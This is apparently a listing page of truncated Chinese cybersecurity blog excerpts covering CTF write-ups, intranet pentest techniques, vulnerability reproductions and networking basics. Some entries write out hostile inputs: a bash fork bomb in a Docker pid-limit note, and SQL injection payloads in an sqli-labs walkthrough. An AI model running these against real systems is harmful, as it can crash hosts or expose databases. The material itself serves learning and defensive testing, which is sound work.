题目点击页面显示如下点击hctf显示没有账号，先注册一个随便注册一个试试看输入账号密码显示如下页面没有其他的提示，查看源代码这里提示不是admin 先注册一个admin账号试一下显示admin已经被注册了，所以知道用户名为admin&#xff0…

命令执行RCE及其绕过详细总结（17000＋字数！）

目录操作系统连接符： 常见函数： 绕过过滤： 空格过滤绕过： 1、大括号{}： 2、$IFS代替空格： 3、重定向字符<，<> 4、%09绕过（相当于Tab键） 文件名过滤绕过…

pid-limit参数实验

fork炸弹命令 :(){ :|:& };: 可以看到，如果docker没有限制，会遭到fork炸弹恶意参考 https://www.cyberciti.biz/faq/understanding-bash-fork-bomb/

羊了个羊抓包速通，让第二关变成和第一关一样难度

目录一.前言二.前期准备 2.1抓包环境 2.2安装电脑版微信环境 2.3配置bp与浏览器VPN 2.4配置proxifier 三.开始抓包 3.1前期准备 3.2抓包ing 一.前言羊了个羊是一款经典微信小程序游戏，号称“第一关谁都能过，第二关谁能过？“。那…

mtail使用

获取mtail，在https://github.com/google/mtail 下载二进制文件json.Decoder缓存整个JSON数据到内存，然后才解析成GO值。因此在从io.Reader流读取数据时，或者是从多个流数据解析值时，建议使用json.Decoder.在内存中已经存在json数据…

CDN和CDN加速有什么关联

CDN，很多人可能没见过这个词，它的本义其实就是内容分发网络。它被设计出来主要目的是解决早期互联网数据传输存在拥堵和稳定性差的问题。它不但可以使内容传输的更快、更稳定，还能抵御恶意流量攻击。在原本互联网的基础上利用搭建在全国乃至全…

网络安全—自学

1.网络安全是什么网络安全可以基于攻击和防御视角来分类，我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术，而“蓝队”、“安全运营”、“安全运维”则研究防御技术。 2.网络安全市场一、是市场需求量高； 二、则是发展相对成熟…

HTB-MetaTwo

HTB-MetaTwo信息收集开机提权关于前面sql的更多补充信息收集 21 ftp22 ssh80 http 进入网站。查看网站相关信息，发现有wordpress，需要注意wordpress版本或相关插件版本。查看了一下但是需要有wp的登陆账户，可是现在没有。通过首页的…

渗透测试高级技巧（一）：分析验签与前端加密

“开局一个登录框” 在黑盒的安全测试的工作开始的时候，打开网站一般来说可能仅仅是一个登录框；很多时候这种系统往往都是自研或者一些业务公司专门研发。最基础的情况下，我们会尝试使用 SQL 注入绕过或者爆破之类的常规手段，如果…

linux管道、重定向和查看命令

目录二、linux管道、重定向和查看命令 1.管道：| 2.tee 3.重定向 4.文件内容浏览 5.文件内容过滤：grep 6.命令搜索 7. find 查找文件---按照文件名称、大小、类型、权限、日期等进行搜索二、linux管道、重定向和查看命令 1.管道：| …

【高危】GitLab CE/EE 存在存储型XSS漏洞

漏洞描述 GitLab 是一款基于Git的代码托管、版本控制、协作开发平台。在 GitLab CE/EE 15.11 至 15.11.6 版本以及 16.0 至 16.0.1 版本中，当GitLab导入GitHub仓库时，如果GitHub仓库中包含由用户构造的恶意JavaScript代码的标签颜色，解析这…

学习渗透测试，考CISP-PTE还是考NISP-PT证书呢？

其实两者都可以，但是要看考生的实际需求！ 为什么说两者都可以？ 两个证书都由中国信息安全测评中心颁发，CISP-PTE（注册信息安全渗透测试工程师）,NISP-PT（国家信息安全水平考试渗透测试工程师),…

HackTheBox - Medium - Linux - Sandworm （我的创作纪念日

Sandworm Sandworm 是一台中等难度的 Linux 机器，它托管了一个具有“PGP”验证服务的 Web 应用程序，该服务容易受到服务器端模板注入 （SSTI） 的攻击，导致“Firejail”监狱内的远程代码执行 （RCE&#xff0…

vulnhub靶机Momentum2

下载地址：https://download.vulnhub.com/momentum/Momentum2.ova 主机发现端口扫描端口服务扫描漏洞扫描先去看看web 这里面没有什么，就顺手扫一下目录发现一些可疑的目录比较正常再看一下有没有别的web 看到几个新的东西去看看文件上传啥都没…

内网渗透(七十)之域权限维持之重置DSRM密码

重置DSRM密码目录服务还原模式(DSRM)是Windows域环境中域控的安全模式启动选项。每个域控都有一个本地管理员administrator账户，也就是（DSRM账户）。DSRM的用途是允许管理员在域环境出现故障或崩溃时还原、修复、重建活动目录数据库，使域环境的运行恢复正常。也就是说，DS…

Web安全之常见攻防

前言： 在当下，数据安全与个人隐私受到了前所未有的挑战。如何才能更好地保护我们的数据？接下来分析几种常见的攻击的类型以及防御的方法。一、XSS（Cross Site Script） 首先了解最常见的 XSS 漏洞，XSS (Cr…

Tenda账号密码泄露漏洞复现 [附POC]

文章目录 Tenda账号密码泄露漏洞复现 [附POC]0x01 前言0x02 漏洞描述0x03 影响版本0x04 漏洞环境0x05 漏洞复现1.访问漏洞环境2.构造POC3.复现Tenda账号密码泄露漏洞复现 [附POC] 0x01 前言免责声明：请勿利用文章内的相关技术从事非法测试，由于传播、利用此文所提供的信息…

技术文章 | CVE-2017-12615/CVE-2017-12616:Tomcat信息泄漏和远程代码执行漏洞分析报告

本文来源于阿里云-云栖社区，原文点击这里。一. 漏洞概述 2017年9月19日，Apache Tomcat官方确认并修复了两个高危漏洞，漏洞CVE编号:CVE-2017-12615和CVE-2017-12616,该漏洞受影响版本为7.0-7.80之间，官方评级为高危，在…

搞网安的人才有的小习惯，你有吗？

在知乎上看到了这个问题，觉得很有意思，整理一下各位知友的回答，给大家看看。下面这些习惯你有没有呢？ 1、摄像头不放在卧室/用胶布遮住摄像头（包括手机、笔记本、摄像机等） 2、看网站的时候会在参数里加…

网络安全概念详解

人们对网络安全工程师的有哪些误会？ “你们搞安全的盗个微信号/ QQ号应该很简单吧？” 说起来，我们经常说安全、安全，网络安全到底是什么？今天我们就来一探究竟！ 一、什么是网络安全？ 百度上对…

【内网学习笔记】26、ntds.dit 的提取与散列值导出

0、前言在活动目录中，所有数据都保存在 ntds.dit 文件中，ntds.dit 是一个二进制文件，存储位置为域控的 %SystemRoot%\ntds.dit ntds.dit 中包含（但不限于）用户名、散列值、组、GPP、OU 等与活动目录相关的信息&…

BUUCTF 世上无难事 1

题目描述： 以下是某国现任总统外发的一段指令，经过一种奇异的加密方式，毫无规律，看来只能分析了。请将这段语句还原成通顺语句，并从中找到key作为答案提交，答案是32位，包含小写字母。注意&…

客户的认可，是我们前行中最大的动力

近日，天空卫士连续收到中国联合网络通信集团和海信集团的感谢信。信中对天空卫士的技术支撑能力、资源调配能力和敬业精神提出高度表扬。全力协助中国联通“供应链安全” 实战演练圆满完成中国联合网络通信集团有限公司发出感谢信，对天空卫士在2023年集…

践行公益担当 | 关爱留守儿童，暖到“心理”

农民在中国各个时代都扮演着十分重要的角色，为中国的发展做出了卓越的贡献。随着经济的发展，农民为了改善生活而大规模的进城打工，“留守儿童”成为一个新的社会问题，开始在农村甚至部分城市出现。全国“留守儿童”达6102.55万&…

网络安全那些事儿

之前很少对网络安全的基础技术有深入的了解，今天在项目中涉及到了公钥和私钥的一些知识，于是索性在网上找了资料来系统了解一下。 1. 网络安全技术的目的互联网最初的设计是基于网络透明性的，一开始并没有考虑到网络安全的问题，…

新华三H3C无线控制器AC对接网络准入实现定制化Portal短信认证

随着企业办公信息化的不断发展，企业内网安全也面临着诸多挑战。在包含了无线 WiFi、有线网络的混合网络环境中，员工或访客、外包人员、合作伙伴等用户在接入网络时，如果无需进行身份验证及访问权限的管理，则很可能给不法分子可乘之…

可信计算原理浅析及平台构建

文章目录一、引言二、可信计算的概念2.1 可信计算的定义2.2 如何获得信任2.3 可信计算的基本思想三、我国可信计算平台构建3.1 可信计算平台的分类3.2 可信边界3.3 国产可信计算平台体系结构3.4 可信硬件设计3.5 可信软件设计3.5.1 可信固件3.5.2 可信虚拟机监视器3.5.3 可信操…

什么是CC攻击？

CC攻击：DDOS(分布式拒绝服务攻击)的一种。黑客利用代理服务器或者控制的肉鸡，向目标web网页发送大量的请求，致使CPU处理不过来这么多的请求，长期处于100%的状态。造成通过该页面访问的端口堵塞，正常请求进不来。怎么…

《网络安全0-100》前期准备

二、学习网络安全的一些前期准备 1.硬件选择经常会问我“学习网络安全需要配置很高的电脑吗？”答案是否定的，黑客用的电脑，不需要什么高的配置，只要稳定就行.因为黑客所使用的一些程序，低端CPU也可以很好的运行&…

GB/T 28448-2019 《信息安全技术网络安全等级保护测评要求》之安全区域边界解读

文章目录前言一、边界防护二、访问控制三、入侵防范四、恶意代码和垃圾邮件防范五、安全审计六、可信验证总结前言本期继续对GB/T 28448-2019 《信息安全技术网络安全等级保护测评要求》中第三级测评要求的安全测评通用要求进行解读，本期主要对安全区域边界进行…

网络安全学习--单臂路由

单臂路由 VLAN控制广播域不同VLAN间无法通信1个VLAN1个网段不同VLAN间通信是靠路由来实现的通过单臂路由实现不同VLAN之间的设备通信 1. 以下实验需设置两个VLAN VLAN10:10.1.1.0/24 VLAN20:20.1.1.0/24 2. 三台交换机上都配置VLAN10,VLAN20,将10.1.1.0/24网段主机加入VLAN…

网络安全学习--VLAN

VLAN(Virtual LAN)虚拟局域网 VLAN属于2层技术广播的危害增加网络/终端负担，传播病毒，安全性如何控制广播控制广播隔离广播域路由器隔离广播(物理隔离广播) 路由器隔离广播缺点：成本高，不灵活采用新的技术VLAN控制广播…

Vulnhub: DarkHole:1靶机

kali：192.168.111.111 靶机：192.168.111.130 信息收集端口扫描 nmap -A -sC -v -sV -T5 -p- --scripthttp-enum 192.168.111.130 访问目标web网站，注册用户注册时尝试注册用户名为admin的用户，发现存在该用户进入用户后台&…

网络安全学习--路由器学习

路由跨越从源主机到目标主机的一个互联网络来转发数据包的过程，即路由器为IP包选择路径的过程路由器根据路由表做路径选择路由表直连网段配置IP地址，端口UP非直连网段管理距离值（A值）:值越小，优先级越高 C(d…

网络安全学习--域（一）

域 Domain内网环境工作组：默认模式，人人平等域：人人不平等，集中管理，统一管理域的特点集中/统一管理域的组成域控制器：DC(Domain Controller)成员机： 域的部署安装域控制器–生成域环…

【内网学习笔记】16、组策略凭据获取

0、前言 SYSVOL 是活动目录里的一个用于存储域公共文件服务器副本的共享文件夹，在域中的所有域控之间进行复制，SYSVOL 在所有经过身份验证的域用户或者域信任用户具有读权限的活动目录域范围内共享，所有的域策略均存放在 C:\Windows\SYSVOL\…

网络安全学习--DHCP部署与安全

本文所有事例在虚拟机上完成 DHCP作用 DHCP(Dynamic Host Configure Protocol)自动分配IP地址 DHCP相关概念地址池/作用域：(IP、子网掩码、网关、DNS)，DHCP协议端口是UDP 67/68 DHCP优点减少工作量、避免IP冲突、提高地址利用率 DHCP原理成为…

网络安全学习--服务器远程管理

问题1： 解决方法： #普通用户无法远程连接至服务器，需要给用户添加至Remote Desktop Users组中，添加完成后，连接正常 #通过命令将tye添加至Remote Desktop Users组中C:\Documents and Settings\Administrator>ne…

phpstudy集成环境搭建网站

建站文章目录建站phpstudy建站MySQL数据库配置网站结构login.htmllogin.phpregister.htmlregister.phpphp连接数据库的代码优化phpstudy建站 phpstudy创建网站(empire)之后生成D:\phpstudy_pro\WWW\empire文件夹,下面有两个文件 empire{.htaccessnginx.htaccessempire\begin{…

web渗透测试——小迪 web安全｜渗透测试｜网络安全工程师

https://www.bilibili.com/video/BV1JZ4y1c7ro?fromsearch&seid5579446180309813561 第01天：基础入门-概念名词 www 顶级域名（二级域名） news.baidu.com 多级域名收集信息主站分站 （换突破口） DNS 主要用于域…

温度对光模块的影响

大家都知道DDM信息是包含温度、电压、电流、发射光功率和接受灵敏度的，这是我们不用通过特殊技术手段就可以查看到的信息。这几个参数有些是会相互影响的，只有五个参数全部正常才是光模块正常通信的前提。以下要讲述的是温度对光模块的影响。我…

发射光功率和接收灵敏度对光模块的实际使用有什么影响？

在光模块的DDM(数字诊断信息）中，可以看出五个参数信息，分别是工作温度、工作电压、偏置电流、发射光功率和接收灵敏度。工作温度、工作电压和偏置电流相对来说趋于稳定，客户在选购时特别看重的就是发射光功率和接收灵敏度。这两个…

光纤收发器的基础知识

什么是光纤收发器？ 光纤收发器是一种将短距离的电信号和长距离的光信号进行相互转换的设备，也叫做光电转换器。光纤收发器和光模块的作用是一样的，都是进行光电转换的。一般使用在网线无法连接必须使用光纤来进行延长传输距离的网络环…

为什么网线传输不超过一百米？

众所周知电口模块最远只能传输100M，其原因就是网线一般传输距离只能是100M，超过100M数据就不能保证稳定传输，掉包严重或者根本不通。但是为什么只能达到100M呢？ 信号在传输的过程中是以二进制的0和1来表示的。而一般默认在…

DHCP是什么？一文详解其工作过程及配置

DHCP是什么？ DHCP是动态主机配置协议，是为解决传统的静态手工配置方式的不足应运而生的一种技术，可以实现网络动态合理地分配IP地址给主机使用。为什么要用DHCP，它有什么优点？ DHCP工作过程广播的Request报文让网络…

独家专访｜对话运营“三剑客”理论创始人黎想，解读私域运营秘籍

随着后疫情时代的到来，越来越多的企业开始向数字化转型。线上运营、全网营销、私域流量成为了各企业的必“造”之地。企业投入大量资金、人力用于“引流”，却也因而呈现黑产侵害、数据造假、平台“崩瘫”、内容违规、成本过高等各种问题，为企…

流言证实：“键盘记录器”确实存在，请大家注意网络安全

原帖地址： http://bbs.csdn.net/topics/390620753?page1#post-395857689 帖子内容： 流言证实：“键盘记录器”确实存在，而且可能比我们想象的更强大】有关“键盘记录器”的流言再次在微博流传，不少网友对此表示怀疑…

【内网学习笔记】29、白银票据

0、前言白银票据（Sliver Ticket） 不同于黄金票据（Golden Ticket） Kerberos 协议详解：https://teamssix.com/210923-151418.html 白银票据不与密钥分发中心 KDC 交互，因此没有了 Kerberos 认证协议里的前 …

黑客一般是如何入侵电脑的？

1.无论什么站，无论什么语言，我要渗透，第一件事就是扫目录，最好一下扫出个上传点，直接上传 shell ，诸位不要笑，有时候你花很久搞一个站，最后发现有个现成的上传点，而且很容…

网渗透(二十二)之Windows协议认证和密码抓取-Silver Ticket白银票据制作原理及利用方式

系列文章第一章节之基础知识篇内网渗透(一)之基础知识-内网渗透介绍和概述内网渗透(二)之基础知识-工作组介绍内网渗透(三)之基础知识-域环境的介绍和优点内网渗透(四)之基础知识-搭建域环境内网渗透(五)之基础知识-Active Directory活动目录介绍和使用内网渗透(六)之基…

应急响应——靶场实践

唉，我可算直到值守每天12小时看警报是多么怨种的一工作，本以为该结束了，结果又加了一天！！！！ 还好我没放弃自己，一直在自学东西（也不是我愿意的，这也不是没有…

Windows逆向安全（一）之基础知识（十）

汇编一维数组之前的文章学习过了四种基本类型：char short int long的汇编表示形式因为它们的数据宽度都小于等于32位，所以都可以只用一个通用寄存器来存储接下来的数组显然就无法只用一个通用寄存器就可以存储了在学习数组之前，再学习…

练[BJDCTF2020]Easy MD5

[BJDCTF2020]Easy MD5 文章目录 [BJDCTF2020]Easy MD5掌握知识解题思路关键paylaod 掌握知识强等于和弱等于的MD5绕过，数据库查询的MD5加密绕过，代码审计解题思路打开题目链接，发现是一个post提交框，提交完了也就是url发…

批处理小程序的制作

一、介绍批处理是一种将一系列计算机任务按照预定义的顺序进行自动化处理的技术。它是通过批处理脚本或命令文件来实现的，可以在不需要人工干预的情况下，批量运行多个命令或程序。批处理脚本的优点 1. 自动化：批处理可以自动执行重复性任…

网络安全（黑客技术）自学规划

一、什么是网络安全网络安全可以基于攻击和防御视角来分类，我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术，而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域，都有攻与防两面性…

HCIA笔记-----第五天(动态路由RIP和OSPF)

静态路由和动态路由的区别静态路由：由网络管理员手工添加的路由动态路由：所有路由器上运行相同的路由协议，之后，通过路由器之间的沟通交流，最终计算生成的路由条目。静态路由的优缺点： 优点&#xff1…

保护你的数据安全，了解网络安全法！

网络安全法是中国自2017年6月1日起实施的一项法律，旨在保障网络安全和信息安全，维护国家安全和社会稳定。网络安全法覆盖了众多方面，包括网络基础设施安全、网络运营安全、个人信息保护、网络安全监管等，具有重要的法律意义和社会…

sqli-labs通关lesson36-40

1.lesson36 union select判断注入：为单引号注入?id1%df-- 查数据库：?id-1%df union select 1,2,database()-- 2.lesson-37 报错注入判断注入：为单引号注入通过下方判断password为单引号注入unamez&passwdg%df -- &submitSubmit查数…

DDoS类型攻击对企业造成的危害

超级科技实验室的一项研究发现，每十家企业中，有四家(39%)企业没有做好准备应对DDoS攻击，保护自身安全。且不了解应对这类攻击最有效的保护手段是什么。由于缺乏相关安全知识和保护，使得企业面临巨大的风险。当黑客发动DDoS攻击…

关于网络安全的正确学习路线

网络安全学习路线可以分为以下几个阶段： 第一阶段：基础知识学习学习计算机网络基础知识，包括网络协议、TCP/IP 协议栈、网络拓扑等。学习操作系统的原理和安全机制，包括 Windows、Linux 等主流操作系统。学习编程语言&#xff…

给准备面试网络工程师岗位的应届生一些建议

你听完这个故事，应该会有所收获。最近有一个23届毕业的大学生和我聊天，他现在网络工程专业大四，因为今年6、7月份的时候毕业，所以现在面临找工作的问题。不管是现在找一份实习工作，还是毕业后找一份正式工作&#xff0…

Coremail专家观点:如何应对当前AI技术对邮件安全的影响

近日，ChatGPT在互联网上掀起了一阵热潮，目前月活用户超过 1 亿，注册用户之多导致服务器一度爆满。人工智能的话题遍地可见，如“ChatGPT会取代哪些行业？”、“ChatGPT的实现原理”、“ChatGPT的玩转攻略”等等&#x…

OSPF的选路原则，重发布与RIP

OSPF的选路原则域内路由 --- 1类，2类LSA 域间路由 --- 3类LSA 域外路由 --- 5类，7类LSA --- 类型1，类型2 1，域内路由如果都是通过1类和2类LSA学习到的域内路由信息，则将直接比较开销值，开销值小的&#xf…

Goby漏洞更新 | YoudianCMS v9.5.0 sql注入（CVE-2022-32300）

漏洞名称：YoudianCMS v9.5.0 sql注入（CVE-2022-32300） English Name：YoudianCMS v9.5.0 SQL Injection (CVE-2022-32300) CVSS core: 8.8 影响资产数：987 漏洞描述： YouDianCMS是一个网站CMS。Youdian…

2023年网络安全HW面试经典收藏

1.应急响应查找内容分析服务器上的安全问题，你关注哪些数据？ 进程，日志，告警信息，威胁情报，文档编辑时间，启动项，路由管理，防火墙，最后登录时间&#xff0c…

ToBeWritten之理解嵌入式Web Soap协议

也许每个人出生的时候都以为这世界都是为他一个人而存在的，当他发现自己错的时候，他便开始长大少走了弯路，也就错过了风景，无论如何，感谢经历转移发布平台通知：将不再在CSDN博客发布新文章，敬…

Nexus安卓木马分析报告

概述 2023年3月21日晚上，链安与中睿天下联合研发的监控系统检测到一种新型安卓木马。在经过睿士沙箱系统捕获样本之后，发现该安卓木马极有可能是原安卓网银盗号木马SOVA的变种。与此同时，意大利安全公司Cleafy发布了一篇题为《Nexus&#xff…

ToBeWritten之硬件攻防

也许每个人出生的时候都以为这世界都是为他一个人而存在的，当他发现自己错的时候，他便开始长大少走了弯路，也就错过了风景，无论如何，感谢经历转移发布平台通知：将不再在CSDN博客发布新文章，敬…

IDE集成开发工具-IDEA（一）之IDE的概念

IDE的概念集成开发环境（IDE，Integrated Development Environment ）是用于提供程序开发环境的应用程序，一般包括代码编辑器、编译器、调试器和图形用户界面等工具。集成了代码编写功能、分析功能、编译功能、调试功能等一体化的开…

upload 通关pass16-pass20

1.pass16 白名单二次渲染需要先上传一个正常图片，然后下载下来，跟原图片进行比对，用010 16进制编辑器，把php代码放到没有改变的位置，即一样的地方访问： 2.pass17 白名单条件竞争这题先是上传文件并…

单CDN与融合CDN之间的对比：优缺点及注意事项

CDN是现代互联网服务的重要组成部分，它CDN可帮助内容提供者高速交付内容，不同的服务器部署在全球不同的数据中心，并在它们之间共享相同的网络路径。随着企业意识到CDN的重要性，越来越多的企业正在使用CDN作为内容分发工具。互联网…

内网渗透之横向移动ipc

0x00 内网横向移动介绍内网横向移动是什么在内网渗透中，当攻击者获取到内网某台机器的控制权后，会以被攻陷的主机为跳板，通过收集域内凭证等各种方法，访问域内其他机器，进一步扩大资产范围。通过此类手段&#xff0…

部署CDN的网站如何找真实IP

部署CDN的网站找真实IP 1.概述目前很多网站使用了cdn服务，用了此服务可以隐藏服务器的真实IP，加速网站静态文件的访问，而且你请求网站服务时，cdn服务会根据你所在的地区，选择合适的线路给予你访问，由此达…

【内网学习笔记】28、黄金票据

0、前言 RT 在利用黄金票据（Golden Ticket）进行 PTP 票据传递时，需要先知道以下信息： 伪造的域管理员用户名完整的域名域 SIDkrbtgt 的 NTLM Hash 或 AES-256 值其中 krbtgt 用户是域自带的用户，被 KDC 密钥分发中…

XSS和CSRF的简述与预防

文章目录XSS预防输入过滤输出编码Cookie防盗CSRF例子预防区别XSS 跨站脚本XSS，全称为(Cross-site scripting)，因为可能会与层叠样式表(Casading style sheet)英文简称相同而产生歧义，因此将“C”改为“X”。攻击者在网页中嵌入JavaScript脚…

【内网学习笔记】24、SPN 的应用

0、前言 SPN Windows 域环境是基于微软的活动目录服务工作的，它在网络系统环境中将物理位置分散、所属部门不同的用户进行分组和集中资源，有效地对资源访问控制权限进行细粒度的分配，提高了网络环境的安全性及网络资源统一分配管理的便利性…

【内网学习笔记】22、PsExec 和 WMI 的使用

1、PsExec PsExec.exe PsExec 在之前的文章里提到过一次，参见https://teamssix.com/210802-181052.html，今天来着重学习一下。 PsExec 是 PSTools 工具包里的一部分，其下载地址为：https://download.sysinternals.com/files/PST…

IP地址这么重要的知识，居然听一个学弟说没用？

创作不易，如有帮助请点赞支持一下下目录一.IP地址是什么二.IP地址的组成三.IP地址的表示/基本呈现四.IP地址分类---有类编址五.IP地址类型六.IP地址计算七.特殊IP地址一.IP地址是什么 1.IP地址就像现实中的地址，可以标识网络中的一个节点&…

科普一下网络的灵魂 ACL

目录前言一、ACL概述二、ACL的组成三、通配符四、ACL的分类与标识五、ACL的基础配置及应用前言网络飞速发展，网络业务变得越来越普及，人们已经不满足于仅仅能通信的目的，人们对网络安全与网络服务质量的要求也变得越来越高&…

xyhcms getshell

下载xyhcms3.6.2021版本并用phpstudy搭建 function get_cookie($name, $key ) {if (!isset($_COOKIE[$name])) {return null;}$key empty($key) ? C(CFG_COOKIE_ENCODE) : $key;$value $_COOKIE[$name];$key md5($key);$sc new \Common\Lib\SysCrypt($key);$value $sc-…

Apache网页与优化(压缩、缓存、版本信息隐藏、防盗链设置)

网页与安全优化网页压缩1.检查mod_deflate模块是否安装，如未安装则进行重新编译添加模块2.配置mod_deflate模块启用3.检查安装情况并启动服务4.测试mod_deflate压缩是否生效（共两种方式）网页缓存1.检查mod_expires模块是否安装，如…

SSRF攻防

SSRF攻防 SSRF简介 ssrf原理 SSRF(sever-side request forgery：服务器端请求伪造)是一种有攻击者构造形成由服务器端发起请求的安全漏洞。一般情况下，SSRF是要目标网站的内部系统。（因为他是从内部系统访问的，所以可通过它攻击…

连这些题都不会做好意思说自己懂网络？

一、选择题 1. 192.168.1.0/24 使用掩码255.255.255.240 划分子网，其可用子网数为（ ），每个子网内可用主机地址数为（ B） A. 14 14 B. 16 14 C. 254 6 D. 14 62 2. 子网掩码为255.255.0.0 ，下…

VLAN中Access/Trunk/Hybrid接口基础配置讲解

VLAN基础有不懂的可以借鉴本文链接：VLAN原理讲解（挺详细的）_xiaobai729的博客-CSDN博客_vlan指的是目录一、配置接口前肯定先要创建VLAN 1.进入系统视图（用户视图不可以进行配置） 2.创建VLAN 二、Access接…

vmware下安装windows2003

01 新建虚拟机02 基本配置VMWARE中: 虚拟机(M) --> 发送Ctrl Alt Del(E) 03 桌面配置04 vmware tools安装最后: 记得拍摄快照!!!

kali添加用户

1.创建用户zhangsan，-m的意思是创建主目录，默认在/home下创建。 useradd -m zhangsan2.创建完成：

评估安全 Wi-Fi 接入：Cisco ISE、Aruba、Portnox 和 Foxpass

在当今不断变化的数字环境中，对 Wi-Fi 网络进行强大访问控制的需求从未像现在这样重要。各组织一直在寻找能够为其用户提供无缝而安全的体验的解决方案。在本博客中，我们将深入探讨保护 Wi-Fi（和有线）网络的四种领先解决方案——…

网络安全（黑客技术）学习手册

1.网络安全是什么网络安全可以基于攻击和防御视角来分类，我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术，而“蓝队”、“安全运营”、“安全运维”则研究防御技术。 2.网络安全市场一、是市场需求量高； 二、则是发展相对成熟…

资讯精选 | 云战略下的安全思维转型与新认知

从高大的银行建筑，到一丝不苟的流程设计，金融机构对外的第一品质要求是安全感。营造“安全感”的背后，安全能力的完整搭建是一切的起点和路径。对金融行业来说，安全不再是构建看得见的“围墙”，而是在拆掉围墙、融入互…

资讯精选 | 各国加强网络安全法规建设和隐私保护

在网络安全成为热点的今天，各种论坛已经使我们淹没在了资讯的海洋；网络安全资讯的泛滥，并没有提高我们认识网络安全客观世界的水平，反而降低了接收有用知识的效率 — 专业、专注、客观的网络安全资讯，仍为少数。 “政府…

网络安全（黑客技术）0基础学习手册

目录梗概一、自学网络安全学习的误区和陷阱二、学习网络安全的一些前期准备三、网络安全学习路线四、学习资料的推荐想自学网络安全（黑客技术）首先你得了解什么是网络安全！什么是黑客！ 网络安全可以基于攻击和防御视角来…

spring打入filter内存马+冰蝎成功

环境： springboot版本2.4.5 <parent><groupId>org.springframework.boot</groupId><artifactId>spring-boot-starter-parent</artifactId><version>2.4.5</version><relativePath/> <!-- lookup parent from r…

2023第七届蓝帽杯初赛 web LovePHP

LovePHP 直接给了源码。 network查看到，PHP版本是7.4.33 题目要求我们GET一个my_secret.flag参数，根据PHP字符串解析特性，PHP需要将所有参数转换为有效的变量名，因此在解析查询字符串时，它会做两件事： 删…

arping 命令解析

目录一、介绍二、命令格式如下三、参数四、实例一、介绍 ARP协议是“Address Resolution Protocol”（地址解析协议）的缩写。在同一以太网中，通过地址解析协议，源主机可以通过目的主机的IP地址获得目的主机的MAC地址。arp…

Python join()函数使用详解

「作者主页」：士别三日wyx 「作者简介」：CSDN top100、阿里云博客专家、华为云享专家、网络安全领域优质创作者「推荐专栏」：小白零基础《Python入门到精通》 join 1、参数要求2、拼接不同的数据类型2.1、字符串2.2、列表2.3、元组2.4、字典…

边缘智能相关论文(Edge Intelligence Federated Learning)

边缘智能相关论文Fast InferenceModel CompressionReduction in CommunicationFederated Learning and OptimizationFederated Learning and security最近边缘计算方面出了很多新的研究成果，在AI背景下，边缘智能（Edge Intelligence&#xff0…

内网渗透(五十九)组策略首选项提权

组策略首选项提权组策略的安全问题组策略拥有强大的功能，在使用过程中，如果使用不当或被攻击者恶意滥用，就会存在严重的安全问题组策略首选项提权前面我们讲到了GPT的存储位置位于域控的%systemroot%\sysvol\domain\Policies 文件夹内，任何用户可以访问该文件夹。 …

内网渗透(十五)之内网信息收集-域环境中定位域管理员

系列文章第一章节之基础知识篇内网渗透(一)之基础知识-内网渗透介绍和概述内网渗透(二)之基础知识-工作组介绍内网渗透(三)之基础知识-域环境的介绍和优点内网渗透(四)之基础知识-搭建域环境内网渗透(五)之基础知识-Active Directory活动目录介绍和使用内网渗透(六)之基…

[ vulhub漏洞复现篇 ] Drupal 远程代码执行漏洞（CVE-2018-7602）

🍬 博主介绍 👨‍🎓 博主介绍：大家好，我是 _PowerShell ，很高兴认识大家~ ✨主攻领域：【渗透领域】【数据通信】【通讯安全】【web安全】【面试分析】 🎉点赞➕评论➕收藏养成习…

白帽黑客入行应该怎么学？零基础小白也能轻松上手！

这几年随着我国《国家网络空间安全战略》《网络安全法》《网络安全等级保护2.0》等一系列政策/法规/标准的持续落地，网络安全行业地位、薪资随之水涨船高。 1为什么网络安全行业是IT行业最后的红利？ 根据腾讯安全发布的《互联网安全报告》，…

应用篇|网络安全知识培训考试，答题小程序操作指引

网络安全知识培训考试，答题小程序操作指引关于全民防诈反诈宣传或者网络安全知识学习，如何进行组织一场微信线上答题考试？可以在小程序“护网专题信息安全知识竞答”，先创建一个学习单位/小组，再邀请成员加入单位/小组…

全国职业院校技能大赛网络建设与运维赛项赛题(三)

全国职业院校技能大赛网络建设与运维赛题 (三)

Web安全：AppScan 安装和使用.(渗透常用工具)

Web安全：AppScan 安装和使用. AppScan是一款web安全扫描工具，可以利用爬虫技术进行网站安全渗透测试，根据网站入口自动对网页链接进行安全扫描，扫描之后会提供扫描报告和修复建议等. 目录： Web安全：AppSc…

物理环境与网络通信安全

物理环境与网络通信安全物理和环境安全环境安全设施安全-安全区域与边界防护传输安全 OSI七层模型ISO/OSI七层模型结构OSI模型特点OSI安全体系结构 TCP/IP协议安全TCP/IP协议结构网络接口层网络互联层核心协议-IP协议传输层协议-TCP（传输控制协议）传输层…

Kali-linux测试网络范围

测试网络范围内的IP地址或域名也是渗透测试的一个重要部分。通过测试网络范围内的IP地址或域名，确定是否有人入侵自己的网络中并损害系统。不少单位选择仅对局部IP基础架构进行渗透测试，但从现在的安全形势来看，只有对整个IT基础架构进行测试…

【网络安全软件】上海道宁与Cybereason为您提供未雨绸缪的攻击保护，终结对端点、整个企业以及网络上任何角落的网络攻击

Cybereason可收集计算机网络内任何活动方面的数据如运行当中的程序被用户访问的文件以及员工及任何获授权使用网络中的计算机人的键盘输入和鼠标移动情况 Cybereason提供即时结束网络攻击的精确度在计算机、移动设备、服务器和云中到战斗移动的任何地方一、开…

Kali-linux目录加密

在Kali中提供了一个目录加密工具TrueCrypt。该工具是一款开源的绿色加密卷加密软件，不需要生成任何文件即可在硬盘上建立虚拟磁盘。用户可以按照盘符进行访问，所以虚拟磁盘上的文件都被自动加密，访问时需要使用密码解密。TrueCrypt提供多种加…

Web安全之Content Security Policy(CSP 内容安全策略)详解

什么是Content Security Policy（CSP） Content Security Policy是一种网页安全策略，现代浏览器使用它来增强网页的安全性。可以通过Content Security Policy来限制哪些资源(如JavaScript、CSS、图像等)可以被加载，从哪些url加载。…

越来越多企业出现网络安全问题，是什么原因导致的？

近年来网络安全问题层出不穷，信息泄露、网络钓鱼、黑客攻击等问题频繁发生。尽管有证据表明在一些全球知名的企业组织中存在价值数十亿美元的网络安全漏洞，但企业仍然没有认真对待网络安全。大公司在寻找各种理由来减少其网络安全预算，从而…

【以太网安全实验】--- 端口安全/防MAC地址飘移/防伪冒DHCP攻击/MAC地址表安全

